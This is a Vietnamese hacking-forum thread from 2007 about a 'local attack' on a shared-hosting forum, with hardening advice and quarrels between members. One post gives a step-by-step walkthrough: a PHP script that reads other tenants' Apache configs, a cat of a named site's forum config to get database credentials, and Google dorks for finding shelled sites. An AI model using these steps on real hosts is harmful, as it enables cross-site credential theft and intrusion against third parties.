banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Tản mạn Local Attack :D  XML
  [Question]   Tản mạn Local Attack :D 21/06/2007 07:33:20 (+0700) | #1 | 65952
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
[color="#FF0000"]Phấn 1 :[/color]

Mấy ngày qua VN Magic đã bị tấn công liên tục do sự bất cẩn của Quỷnh Anh trong công việc bảo mật . Qua sự việc này Quỳnh Anh tổng kết lại 1 vài điểm căn bản về các hướng đi của attackers trong quá trình local attack . Bài viết sẽ chia làm nhiều phần khác nhau dựa trên các server cấu hình khác nhau và công dụng của r57 , c99 .

Trước tiên để mở đầu Quỳnh Anh sẽ tóm tắt lại quá trình VN Magic bị hack như thế nào . Đây thật sự là 1 sai lầm rất lớn của Quỷnh Anh nhưng cũng có thể là bài học kinh nghiệm dành cho các webmasters khác .

Diễn đàn VN Magic phát triển trên mã nguồn IPB , và dĩ nhiên là ko hợp pháp vì sử dụng bản nulled , điều này sẽ hạn chế 1 số chức năng hữu ích so với bản có bản quyền , vấn đề này chúng ta sẽ thảo luận ở 1 đề tài khác . Sai lầm của Quỳnh Anh bắt nguồn từ việc import skin của diễn đàn , Quỳnh Anh đã download các skin shared ko rõ nguồn gốc từ các site về IPB của Việt Nam . Trước đây Quỷnh Anh qua trang Google đã có biết đến việc đính kèm shell vào skin forum như sources shared do 1 nhóm " hắc cờ " Việt Nam thực hiện .

Các bạn hãy mở trang Google lên và search với từ khóa sau :

Code:
intitle:R57shell - Developed by Navaro - Vn Force Group





Kết quả sẽ cho ta rất nhiều sites đã bị đính kèm shell của nhóm Vn Force Group nào đó , lướt sơ qua các links tìm được từ Google sẽ cho ta biết các sites nạn nhân đa số đều sử dụng sources , skin cho forum đã bị đính kèm php shell , Quỳnh Anh xin để các bạn cảm nhận riêng của mỗi người về [color="#FF0000"]thủ đoạn[/color] này . Từ đây rút ra 1 kinh nghiệm xương máu rằng trên đời hiếm có thứ gì được chia sẽ mà ko kèm mục đích , mục đích tốt hay xấu thì tùy cá nhân smilie . Trên các mã nguồn bất hợp pháp được share tràn lan thì việc đính kèm 1 đoạn mã độc , kèm backdoor là việc hoàn toàn có khả năng xảy ra .

Thật đáng tiếc là VN Magic lại trở thành nạn nhân khi sử dụng " nguồn tài nguyên vô tận " từ Internet ( theo cách gọi nôm na của mọi người smilie . Skin đã bị đính kèm mã độc ngay từ đầu mà Quỳnh Anh ko phát hiện ra . Quỳnh Anh sẽ đơn cử 1 vài đoạn code đính kèm tưởng như vô hại nhưng mà là cả 1 vấn đề đối với những người hiểu biết về lập trình PHP ở các phần sau của bài viết này .

Nhưng Quỳnh Anh thiết nghĩ điều này cũng ko thể ngăn cản chúng ta sử dụng free stuffs từ Internet smilie . Chỉ cần các bạn chú ý hơn trong công việc bảo mật site của mình . Ví dụ như với các skin shared dành cho IPB nếu có đính kèm shell hay mã độc thì chúng ta sau khi import vào board của mình , hãy tạo 1 files [color="#FF0000"].htaccess[/color] có nội dung sau và đâ vào các folders chức files skin :

<Files ~ "^.*\.([color="#FF0000"]php|cgi|pl|php3|php4|php5|php6|phtml|shtml[/color])">
Order allow,deny
Deny from all
</Files> 


Với hàng màu đỏ là tùy biến các đuôi files ko cho phép sử dụng trực tiếp , các bạn có thể thêm vào hoặc bớt đi các tùy biến khác . Và đối với các trang sử dụng IPB chúng ta tốt nhất là nên đặt file [color="#FF0000"].htaccess[/color] nói trên
vào tất cả các folders con của board ( trừ directory chính ra smilie ) , tác dụng có lẽ các bạn cũng đã hiểu Quỳnh Anh sẽ ko nói thêm nữa .

Quỳnh Anh viết bài này với mong muốn nhận được sự giúp đỡ ý kiến của tất cả mọi người trên tinh thần chia sẽ , rất mong được các anh chị đi trước cũng như bạn bè gần xa hướng dẫn thêm cho Quỳnh Anh vì Quỳnh Anh thật sự chỉ là newbie smilie .

Qua sự việc VN Magic bị hack , Quỳnh Anh xin thành thật nhận khuyết điểm và Ban Quản trị VN Magic sau khi xét qua " [color="#00FF00"]công và tội[/color] " của Quỳnh Anh trong thời gian qua đã quyết định hạ Quỳnh Anh xuống 1 cấp ( huhu smilie ) , VN Magic Root Admin hiện tại sẽ do anh [color="#FF0000"]Qhoa[/color] đảm nhận .

Phần 1 Quỳnh Anh xin tạm ngừng ở đây , phần sau chúng ta sẽ thực nghiệm lại quá trình VN Magic bị local attack và hướng local attack tren [color="#FF0000"]IX WEB HOSTING[/color] ( [color="#2E8B57"]ww.ixwebhosting.com[/color] ) .
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 21/06/2007 09:11:47 (+0700) | #2 | 65955
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Lão Na ơi là lão Na. Lão làm gì mà share cho nhiều người con R57 thế để giờ mang tội smilie) . Tốt nhất là bạn nên edit lại cái search nếu không bạn sẽ trở thành người vẽ đường hươu chạy đấy. smilie
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 21/06/2007 10:48:10 (+0700) | #3 | 65974
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
[color="#FF0000"]Phần 2 :[/color]

Ở phần này chúng ta sẽ cùng thảo luận về local attack căn bản nhất là tấn công vào database 1 site ( kỹ thuật nâng cao như Get root và Mass Deface Quỳnh Anh sẽ trình bày ở các phần tiếp theo ) .

Trở lại việc VN MAGIC bị hack như thế nào mời các bạn xem qua hình dưới đây :




Như Quỳnh Anh đã nói qua ở phần 1 , chúng ta sẽ dễ dàng nhận thấy nhân vật dinhcaohack này hóa ra " [color="#FF0000"]upload shell , tìm path và exploit[/color] " lại bằng kiểu như thế smilie ... Điều này chúng ta tạm gác qua một bên vì Quỳnh Anh hiện tại ko muốn nói cảm nhận của mình về 1 con người như vậy . VN Magic lỗi từ trong source nên việc bị drop database ko cần phải nói thêm nữa .

VN Magic thời gian vừa qua đặt trên [color="#FF0000"]IX WEB HOSTING[/color] ( [color="#2E8B57"]www.ixwebhosting.com[/color] ) , do khi mua host , phía nhà cung cấp đã gọi điện thoại để confirm nên Quỳnh Anh quá chủ quan ko chú trọng vào việc bảo mật trang board của VN Magic vì Quỳnh Anh ko nghĩ 1 nhóm nào đó muốn tấn công kiểu local attack vào VN Magic lại có thể dùng CC chùa để mua host được , hoặc ít nhất cũng ko làm vậy ...

Trở lại VN Magic sau khi bị drop , nhân vật dinhcaohack này muốn che dấu các bước đi của mình ( để khai thác lâu dài hay một mục đích gì khác mà Quỳnh Anh chưa biết ) nên đã tạo upload [color="#FF0000"]c99[/color] vào folder [color="#2E8B57"]testsh [/color] của site [color="#2E8B57"]www.viethacker.name[/color] , site này nằm chung account với VN Magic trên IX WEB HOSTING nên không khó để làm việc này vì folder nói trên được [color="#FF0000"]CHMOD 777[/color] ( ở phần 3 của bài viết chúng ta sẽ đi chi tiết vào vấn đề này ) .

Phần dưới đây Quỳnh Anh sẽ trình bày về kiểu local attack căn bản nhất qua sử dụng c99 là tấn công vào database của site . Quỳnh Anh đã nói ở trên là viethacker.name và vnmagic.net cùng 1 account nên không khó gì để khai thác , nhưng bài viết ở dưới đây sẽ ví dụ như viethacker.name và vnmagic.net nằm trên cùng server mà ko có cùng account ( điều này quan trọng vì mỗi các site đặt trên server đều có path riêng dựa theo 1 quy tắc nhất định ) . Chúng ta sẽ tiến hành local attack VN Magic từ c99 mà dinhcaohack đã đặt trên viethacker.name :




Host server của IX WEB HOSTING thoáng qua thì có thể lầm tưởng là khá an toàn khi set quyền trên server , ví dụ như ko thể dùng lệnh cd trực tiếp từ site này qua site khác , ko thể view các thư mục quan trọng , nhưng lại có những kẽ hở khác ví dụ như từ site này có thể dùng lệnh ls để view cấu trúc site khác . Các bạn hãy xem tiếp hình dưới đây sau khi chuyển qua Work Directory là [color="#FF0000"]/hsphere/local/[/color] :




Attacker có thể dễ dàng view thư mục [color="#FF0000"]config[/color] của server , và cũng như vậy đối với phần apache config của các sites đặt trên server .




Các files [color="#FF0000"]*.conf[/color] nếu các bạn có am hiểu về Apache sẽ ko xa lạ gì nữa . Để có thể xem được cấu hình của từng site trên server này , chúng ta sẽ copy lại toàn bộ tên của các files .conf nói trên và tạo 1 php script có nội dung như sau :

<?php
$a="<html><body>";
$a.=file_get_contents("/hsphere/local/config/httpd/sites/[color="#FF0000"]15470533[/color].conf")."<br />";
$a.=file_get_contents("/hsphere/local/config/httpd/sites/15469239.conf")."<br />";
$a.=file_get_contents("/hsphere/local/config/httpd/sites/15468170.conf")."<br />";
$a.=file_get_contents("/hsphere/local/config/httpd/sites/15462385.conf")."<br />";
..............................................................................................................;
$a.=file_get_contents("/hsphere/local/config/httpd/sites/15344463.conf")."<br />";
$a.=file_get_contents("/hsphere/local/config/httpd/sites/15331662.conf")."<br />";
$a.="</body></html>";
echo $a;
?> 


với các số [color="#FF0000"]15470533[/color] chính là tên của config mỗi site , save file này thành hack.php và upload lên folder testsh của viethacker.name ( folder này chmod 777 ) , dùng URL Browser chạy file này ta sẽ có kết quả :




View Page Source và tìm đến tên trang muốn khai thác như bài viết này trình bày về hack vnmagic.net :




Bạn sẽ thấy toàn bộ phần Virtual Host của site , có được path chính của trang vnmagic.net là [color="#FF0000"]/hsphere/local/home/mna291/vnmagic.net[/color] , trở lại c99 dùng lệnh ls -lia :




Ta sẽ thấy được toàn bộ cấu trúc của VN MAGIC , và không khó khăn gì để tiếp tục view vào folder board của vnmagic.net đồng thời dùng lệnh cat để đọc nội dung file config của forum :

cat /hsphere/local/home/mna291/vnmagic.net/board/conf_global.php >>> chúng ta sẽ có kết quả :





Tới đây chắc hẳn mọi người sẽ biết các bước tiếp theo như thế nào rồi . Qua chuyện này Quỳnh Anh thật ko dám đánh giá trình độ của các tay tấn công VN Magic mấy ngày vừa qua , bởi có database rồi mà ko biết làm sao để deface khi vướng cái pass protect của ACP ( gợi ý dùng John The Ripper smilie ) , đành phải giở trò drop database của VN Magic :lol: .

Đã thế trong lúc chuyển server chưa phát hiện lỗi từ source và chưa on .htaccess nên khiến cho nhân vật vn3security nào đó của hội HCE " đục nước béo cò " nhảy vào phá database của VN Magic thêm lần nữa smilie . Nên khinh hay nên buồn cho khả năng của những người như thế nhỉ smilie .

Giải pháp đặt ra tạm thời nếu bạn sử dụng host của server này để chạy 1 forum như VN Magic thì chmod các folders con là 701 , directory chính của site ví dụ như /hsphere/local/home/mna291/vnmagic.net/ chmod 101 sau khi hoàn thành setup board , đồng thời đổi vị trí file config forum và Zend lại toàn bộ source cùng đặt file .htaccess như đã nói ở phần 1 , điều này sẽ hạn chế được rất nhiều sự khai thác của attackers . Tuy ko phải là ko thể khai thác được ( Quỳnh Anh sẽ nói ở 1 chủ đề khác về việc decode Zend ) nhưng ít ra cũng làm mấy anh chàng " gà " cụt hứng .

Phần 2 Quỳnh Anh sẽ ngưng ở đây , phần sau Quỳnh Anh sẽ trình bày 1 số kỹ thuật đơn giản qua các php shell c99 và r57 , netcat bổ sung thêm cho đề tài Local Attack trước khi vào phần nâng cao .
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 21/06/2007 12:17:43 (+0700) | #4 | 65985
[Avatar]
mudzot
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 14:41:27
Messages: 76
Offline
[Profile] [PM]
Không hiểu Navaro là ông nào và VnForce là nhóm nào mà ko thấy xấu hổ. Không biết thêm thắt được gì vào r57shell mà cũng cứ phải táng developed by vào mới chịu được.

Về ví du local attack ở phần 2, giai đoạn đọc file config forum để lấy pass vào database nếu cùng account thì ko sao, nếu khác account mà còn đọc được thì chứng tỏ host xịt, làm ảnh hưởng tới khách hàng. Ý kiến cá nhân của tớ là phải tìm host khác.
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 21/06/2007 17:47:04 (+0700) | #5 | 66000
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Hừm.... lại r57, c99.

Không biết chừng nào mới lớn khôn.
What bringing us together is stronger than what pulling us apart.
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 21/06/2007 20:42:42 (+0700) | #6 | 66009
EnterX
Member

[Minus]    0    [Plus]
Joined: 21/06/2007 09:33:54
Messages: 5
Offline
[Profile] [PM]

conmale wrote:
Hừm.... lại r57, c99.

Không biết chừng nào mới lớn khôn. 

smilie
Cái trò hack local chả có tí chất xám nào cả ==> stupid method
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 21/06/2007 20:45:51 (+0700) | #7 | 66010
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Hôm bữa rảnh một tí, tớ thử phân tích "con" r57 thì thấy có nhiều chi tiết lý thú. Tay Russian nào viết con này rất lém. Những kiddie nào dùng script đó để exploit thành công thì stats sẽ được log đến 1 server (khác). Chính người làm chủ stats server kia sẽ nắm trong tay chính xác bao nhiêu sites bị "con" r57 làm thịt và chính xác site nào luôn.

E rằng các kiddie dùng mấy con script này không biết mấy cái chi tiết đó và đang đi làm... không công cho ai đó smilie). Những server bị nhân nhượng có thể bị biến thành zombies --> hậu hoạn khó lường.

Tip: soi các block base64 để biết chi tiết.
What bringing us together is stronger than what pulling us apart.
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 21/06/2007 23:10:58 (+0700) | #8 | 66035
Mr.Khoai
Moderator

Joined: 27/06/2006 01:55:07
Messages: 954
Offline
[Profile] [PM]
Anh conmale cứ đùa. Các lão "kitties" mà chịu soi cái đống base64 thì chắc đã không chơi các trò vô ích như thế. Cũng phải nói thật, r57 và c99 phải nói là rất phổ biến. Không biết đã có bao nhiêu site bị dính các con này rồi.

khoai
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 21/06/2007 23:33:14 (+0700) | #9 | 66045
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
Cảm ơn anh conmale đã chỉ điểm , em sẽ cố gắng hoàn thành các phần còn lại của bài viết này với hi vọng giúp các newbie như em đúc kết được 1 số kinh nghiệm thiết thực trong việc bảo mật site của mình . Rất mong được các anh chị và các bạn đi trước hướng dẫn thêm cho những sai sót ko thể tránh .

Và đúng như anh Khoai nói , vô số sites đang bị khống chế bởi các loại php shell . Thử dùng Google và search với những từ khóa đơn giản sau đây :

C99:

intitle:c99shell filetype:php 


R57

intitle:r57shell filetype:php 


Php remote wiev

intitle:"phpremoteview" filetype:php 


smilie( .
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 22/06/2007 00:06:58 (+0700) | #10 | 66051
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]

EnterX wrote:

smilie
Cái trò hack local chả có tí chất xám nào cả ==> stupid method
 


GirL no0B xin lỗi vì ko thể chấp nhận nổi ý kiến của bạn , bạn trích lại lời của anh conmale rồi thêm vào câu sau mà ko có suy nghĩ , anh conmale nói như vậy vì ảnh có cái lý riêng của ảnh về r57 và c99 , còn với bạn bạn nghĩ sao mà nói local attack là stupid method ? Local attack có bao nhiêu kiểu khai thác bạn đã nắm hết chưa ? ko lẽ bạn nghĩ phải sử dụng các loại php shell như trên mới local attack được sao ?

Đối với các sever cấu hình lỏng lẻo hoặc có lỗi , kết quả của local attack là get root server và điều này vô cùng nguy hiểm , liệu bạn đã đủ " chất xám " để hiểu các hướng khai thác hay chưa mà bình luận " vớ vẩn " như thế nhỉ ?
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 22/06/2007 04:19:27 (+0700) | #11 | 66103
EnterX
Member

[Minus]    0    [Plus]
Joined: 21/06/2007 09:33:54
Messages: 5
Offline
[Profile] [PM]

GirL Noob wrote:

EnterX wrote:

smilie
Cái trò hack local chả có tí chất xám nào cả ==> stupid method
 


GirL no0B xin lỗi vì ko thể chấp nhận nổi ý kiến của bạn , bạn trích lại lời của anh conmale rồi thêm vào câu sau mà ko có suy nghĩ , anh conmale nói như vậy vì ảnh có cái lý riêng của ảnh về r57 và c99 , còn với bạn bạn nghĩ sao mà nói local attack là stupid method ? Local attack có bao nhiêu kiểu khai thác bạn đã nắm hết chưa ? ko lẽ bạn nghĩ phải sử dụng các loại php shell như trên mới local attack được sao ?

Đối với các sever cấu hình lỏng lẻo hoặc có lỗi , kết quả của local attack là get root server và điều này vô cùng nguy hiểm , liệu bạn đã đủ " chất xám " để hiểu các hướng khai thác hay chưa mà bình luận " vớ vẩn " như thế nhỉ ?
 


Mình nói thế chẳng qua dạo này thấy có quá nhiều người dùng kiểu hack này một cách máy móc, đại loại như hack vbb thông qua hack ipb... Bản thân mình trước đây cũng khác nhiều lần hack local nên mới nói vậy.

Còn mình ko coi thường get root, mình quan niệm get root ở 1 "đẳng cấp khác", là hack server rồi chứ ko còn coi đó là hack web bằng phương pháp local nữa. Do đó theo quan niệm của mình thì local vẫn là 1 "stupid method"
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 22/06/2007 04:24:22 (+0700) | #12 | 66104
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
[color="#FF0000"]Phần 3 :[/color]

Tiêu đề của bài viết này là " [color="#00FF00"]Tản mạn ...[/color] " cho nên Quỳnh Anh nghĩ chúng ta ko nhất thiết phải tập trung vào một vấn đề nào đó mà sẽ thảo luận về tất cả những gì có liên quan xoay quanh chủ đề chính .

Sau 2 phần đầu , lướt sơ qua Quỳnh Anh thấy đa số các bạn mới tìm hiểu về hacking còn rất mơ hồ về vấn đề Local Attack , vậy nên phần này chúng ta sẽ tạm gác các kỹ thuật khai thác cũng như công dụng ( cũng như tác hại smilie ) của r57 , c99 qua 1 bên để bàn ra xa hơn 1 chút nhằm mục đích thư giãn trước khi đi tiếp các phần sau .

Khi Quỳnh Anh đặt ra câu hỏi : [color="#FF0000"]Làm sao để Local Attack 1 site nào đó ( mục tiêu xác định ) ? [/color] thì hầu hết câu trả lời mà Quỷnh Anh nhận được đều đại loại như : " Dễ ẹc , dùng CC chùa mua host chung với site đó rồi up shell lên " , hoặc " Ôi trời có gì đâu , cứ kèm code ( để remote file attack ) hoặc gắn shell vào sources rùi share cho victim download ( như VN MAGIC bị vừa rồi ) " . Hix hix vậy nên đa số đều có vẻ ngập ngừng khi Quỳnh Anh hỏi tiếp : [color="#FF0000"]Nếu victim đặt trên private server ( ko phải share host ) và cũng ko download sources " kèm trẻ em " của mình thì thế nào ?[/color]

Cá nhân Quỳnh Anh nghĩ rằng không có gì là tuyệt đối cả , ko bằng cách này thì cũng sẽ có cách khác ... Tiếp theo dưới đây Quỳnh Anh muốn nhắc lại một chút về công dụng của các trang Search , công cụ tìm kiếm trực tuyến mà nhiều bạn lơ là ko tận dụng . Giả sử như mục tiêu Quỳnh Anh đặt ra là trang hcvgroup.net ( Quỳnh Anh xin lỗi mấy chú HCE Group trước vì lấy site mấy chú làm ví dụ cho bài viết nhưng thiết nghĩ ví dụ thì chỉ là ví dụ , nó chẳng có tác hại gì smilie ) , trang này nằm trên private server và có vẻ khá an toàn .

Mở Command Prompt ping thử trang này xem sao :




Kết quả cho ta thấy IP của site này là 85.114.134.144 . Tiếp tục mở trang [color="#00FF00"]www.live.com[/color] lên và tìm kiếm như sau :




Kết quả sẽ cho chúng ta thấy các sites khác có cùng IP với hcegroup.net :




Nhìn vào kết quả tìm kiếm chúng ta sẽ thấy cái HCE prIvAtE vErsIOn gì đó ( domain hcegroup.biz ) [color="#FF0000"]powered by vBulletin[/color] . Tới đây chắc các bạn cũng hiểu được hướng Quỳnh Anh đang tiến hành rồi phải ko smilie ? Không đi trực tiếp được thì chúng ta sẽ đi vòng hihi .

Tiếp tục vào xem trang này xem có thu thập thêm được thông tin gì ko :

Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2007, Jelsoft Enterprises Ltd.  


Àh àh VBB ver 3.6.4 , hình như VBB có thể chèn thêm code vào temp ( để gọi php shell _ RFI >>> Local Attack hcegroup.net ) nếu chiếm được quyền admin . Mở Yahoo hoặc Google lên và search thử với các từ khóa :

Exploit vBulletin ver 3.6.4 


Kết quả cũng ko đến nổi tệ chứ smilie . Vào trang [color="#00FF00"]www.milw0rm.com[/color] chúng ta sẽ có kết quả trực tiếp hơn :




Quỳnh Anh tạm thời ngừng phần 3 ở đây vì nếu đi tiếp e rằng sẽ lạc đề , chỉ muốn nhắn với ai đó cho rằng Local Attack là " stupid method " thì nên suy nghĩ lại xem mình đã biết gì về Local Attack hay chưa smilie . Các phần sau của bài viết hi vọng sẽ thú vị hơn và giúp cho mọi người có một cái nhìn thực tế hơn về mức độ nguy hiểm của Local Attack .

[color="#9ACD32"]Lưu ý bài viết trên đây chỉ có giá trị tham khảo , thực tế ko hẳn là như vậy đâu nhé các bạn .[/color]











[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 22/06/2007 04:43:26 (+0700) | #13 | 66110
[Avatar]
nhimthulinh
Member

[Minus]    0    [Plus]
Joined: 14/04/2007 16:23:16
Messages: 19
Offline
[Profile] [PM]
Thôi mà, tình hình bắt đầu căng thằng rùi đấy, "anh" EnterX cứ để cho "chị" GirL Noob trình bày hết phần nàycho chúng em học hỏi đã chứ, anh làm "chỉ" cụt hứng tịt luôn thì tụi em (newbie) sẽ mất 1 cơ hội tốt để hỉu thêm về Local Atack đó!!


==Trích lời sư phụ conmale ==
Hôm bữa rảnh một tí, tớ thử phân tích "con" r57 thì thấy có nhiều chi tiết lý thú. Tay Russian nào viết con này rất lém. Những kiddie nào dùng script đó để exploit thành công thì stats sẽ được log đến 1 server (khác). Chính người làm chủ stats server kia sẽ nắm trong tay chính xác bao nhiêu sites bị "con" r57 làm thịt và chính xác site nào luôn.

E rằng các kiddie dùng mấy con script này không biết mấy cái chi tiết đó và đang đi làm... không công cho ai đó . Những server bị nhân nhượng có thể bị biến thành zombies --> hậu hoạn khó lường.

Tip: soi các block base64 để biết chi tiết.
=============

Câu cuối (tip...) sư phụ nói thế nghĩa là sao?? Xin chỉ giáo!

Conmale nói đúng đó, thật ra Nhím cũng là 1 Kiddie (kid + die = ?? ^^), cũng từng nghĩ rằng cứ Local Attack là phải upload cho dc con c99, hay r57 lên host cần attack, cũng từng up dc mấy con lên host của người ta, cũng sử dụng shell của VN Force gì gì đó. Vậy thì mong chị GirL Noob hoàn thành loạt bài viết này để những "nhóc chết" (kid die) tụi em có dịp tìm hiểu và phát triển nhe!


[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 22/06/2007 05:17:17 (+0700) | #14 | 66124
[Avatar]
phstiger
Member

[Minus]    0    [Plus]
Joined: 23/01/2007 17:47:26
Messages: 261
Offline
[Profile] [PM]
Các bác cho hỏi em đã thử với con r57, Safe Mode: OFF view được cấu trúc file của server nhưng không upload và view được file config.php mặc dù thư mục dạng: drwxr-wxr-wxr. Vậy còn điều kiện nào để có thể view và upload file lên nữa không vậy?
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 22/06/2007 06:20:45 (+0700) | #15 | 66148
kilua_vniss
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 00:52:49
Messages: 16
Offline
[Profile] [PM]
Đúng là con gái viết văn dài quá :">
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 22/06/2007 08:08:49 (+0700) | #16 | 66177
[Avatar]
dinhcaohack
Member

[Minus]    0    [Plus]
Joined: 22/04/2004 16:46:51
Messages: 41
Offline
[Profile] [PM] [Yahoo!]
Toàn ý kiến chủ quan (smilie
Từ 1 con c99 ặc ặc .. và 1 file hack + 1 cái nick DCH Em DH rồi đổ vấy cho dch smilie
Tùy anh em suy nghĩ chứ anh em thấy cái việc cd 1 phát sang vnmagic.net luôn là được chứ việc gì phải load hết content của httpd config rồi search path vnmagic.net smilie?
Và thứ 2 là sao hacker lại có shell bên viethacker.name không được nêu ra smilie?
Thứ 3 là sao server mới windows lại bị hack .. lần nữa ( sau khi host ixi bị drop DB) lại nói không rõ ràng mà chỉ ... chờ bài post khác smilie .. việc sử dụng source .. ặc ặc ... xin QA trích dẫn đầy đủ attack method như thế nào được không ? Hay là chỉ 1 vài câu :
Từ đây rút ra 1 kinh nghiệm xương máu rằng trên đời hiếm có thứ gì được chia sẽ mà ko kèm mục đích , mục đích tốt hay xấu thì tùy cá nhân smilie . Trên các mã nguồn bất hợp pháp được share tràn lan thì việc đính kèm 1 đoạn mã độc , kèm backdoor là việc hoàn toàn có khả năng xảy ra .

Thật đáng tiếc là VN Magic lại trở thành nạn nhân khi sử dụng " nguồn tài nguyên vô tận " từ Internet ( theo cách gọi nôm na của mọi người smilie . Skin đã bị đính kèm mã độc ngay từ đầu mà Quỳnh Anh ko phát hiện ra . Quỳnh Anh sẽ đơn cử 1 vài đoạn code đính kèm tưởng như vô hại nhưng mà là cả 1 vấn đề đối với những người hiểu biết về lập trình PHP ở các phần sau của bài viết này .  

Cứ cho là lời nhân vật QA nào đó nhận định là đúng ( ở đây lại thấy 1 điều .. bất cập là có nick Girl Noob post bài của QA bên HVA, ở vnmagic.net cũng có đến .. 2 nicknames : QA v GirlNoob .... Noob hay Núp đấy cứ phải "mượn dao kẻ khác" thế em? )
* Nếu webmaster sử dụng .. nguồn tài nguyên vô tận .. vớ vẩn
Thứ nhất 1 webmaster (về lĩnh vực thành lập 1 site hacking.. có tiếng ) không bao giờ sử dụng 1 shared script khi chưa hiểu mục đích của script đó như thế nào (điển hình ở đây là HVA, VHS và vnISS+) .. Thế vậy script này bị .. dính shell là do ... lấy được trên mạng smilie ... buồn cười .. (mình bắt đầu nhớ tới thuật ngữ scriptkiddies) và em QA phải hiểu
*.1 : em đã bị hack từ trước và có kẻ đã kịp ... gắn shell vào DB em
*.2 : hắn gắn được shell vào DB em .. chứng tỏ .. hắn có chứ đừng nói là thừa khả năng để deface site em smilie
*.3 : lần thứ 2 server của em bị hack (dedicated windows server) chẳng phải là do .. bind shell ở cái nào cả smilie < sorry 3verybodie, keep secret! >

** Cái hình đoạn chat của nhân vật " DCH Em DH " với em có thể 1 trong 2 là faked ? Bởi vì ai trong HCV cũng rõ anh và des là 2 .. người rất thân smilie ( Ở đây người ta nghĩ tới 1 cảnh tâm lý chiến chia rẽ 2 người smilie supernoob)

In short, a thấy rất quái lạ là chỉ trong 1-2 tháng mới thành lập, vnmagic lần lượt thách thức matrix2k ( direct domain matrix2k.org đã bị lão Neo bán từ lâu ), HCE ( vnForce Group), HCV ( defaced ), vnISS+ ( kjngasawa shouted fuckin' sth ...) smilie .. Nhưng không lạ lắm là vnmagic cũng đã bị các nhóm trên deface + drop DB tính lần lượt là 3 lần smilie

P/S : anh chỉ khuyên em thế này, anh thấy có khá nhiều người PM anh hỏi chuyện này nhưng hầu hết là kiểu :
xxx: ke. no
xxx: nhung ma
xxx: cai' dua' post cai bai nay len
xxx: no' ko hieu la
xxx: nhu dang khoe
xxx: trinh do. cua? no' con non lam' hay sao i


Vài lời nhố nhăng :p
dinhcaohack smilie
vnISS+ HVA .
[Locked] [Up] [Print Copy]
  [Question]   Tản mạn Local Attack :D 22/06/2007 08:41:58 (+0700) | #17 | 66182
EnterX
Member

[Minus]    0    [Plus]
Joined: 21/06/2007 09:33:54
Messages: 5
Offline
[Profile] [PM]
Khi đọc đầu phần 3 tôi đã định ko can thiệp và để bạn girl noob tiếp tục topic của bạn. Nhưng đến cuối lại có 1 câu:
chỉ muốn nhắn với ai đó cho rằng Local Attack là " stupid method " thì nên suy nghĩ lại xem mình đã biết gì về Local Attack hay chưa smilie 

Phải chăng bạn coi thường tôi ??? Và dựa vào đâu ???
Xin nhắc lại điều mà ở trên tôi đã nói: tôi đã qua cái thời suốt ngày chỉ đi dùng các bug đã public + local att để hack. Chính bản thân đã từng bị chửi là "stupid method". Tôi ko phải là 1 kẻ kiêu ngạo nhưng cũng đủ tự tin để có câu trả lời "biết rất nhiều" đối với câu hỏi :
xem mình đã biết gì về Local Attack hay chưa  

Đừng nhìn người bằng nửa con mắt thế ???
Topic này bàn về kỹ thuật song lại vô cớ đụng chạm và bới móc tới nhiều người, nào là HCE , nào là DCH.
Vậy ý đồ của bạn khi mở topic này là gì ???
Xin lỗi vì đã làm loãng chủ đề, bạn girl noob có thể tiếp tục.
[Locked] [Up] [Print Copy]
  [Question]   Re: Tản mạn Local Attack :D 22/06/2007 13:50:31 (+0700) | #18 | 66222
[Avatar]
GirL Noob
Member

[Minus]    0    [Plus]
Joined: 01/05/2007 10:29:43
Messages: 18
Offline
[Profile] [PM]
Hihi để tránh làm loãng đề tài , trước khi bước sang phần 4 của bài GirL no0B xin được cảm ơn và tiếp thu ý kiến của tất cả mọi người quan tâm đến chủ đề này và cũng muốn hồi đáp lại lời của dinhcaohack và EnterX 1 lần cuối cùng .

